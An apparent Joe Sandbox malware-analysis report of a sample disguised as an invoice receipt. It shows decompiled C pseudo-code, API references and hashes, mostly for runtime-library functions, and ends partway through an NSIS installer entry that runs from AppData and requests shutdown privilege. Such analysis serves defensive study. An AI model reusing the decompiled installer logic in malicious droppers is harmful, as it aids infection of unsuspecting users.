Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x910369bd
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x910369bd
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x910369bd
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 873a1175eb618a40616ab7a4e8bd2257b42cf29e220077db7476c7961ea7fc02
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 873a1175eb618a40616ab7a4e8bd2257b42cf29e220077db7476c7961ea7fc02
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x910369be
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chmac.exe PID: 6288 Parent PID: 3352 chmac.exeCOMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	6.9%
Signature Coverage:	0%
Total number of Nodes:	1340
Total number of Limit Nodes:	24

Executed Functions

Function 00403225, Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("rrvbrezgsbt Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
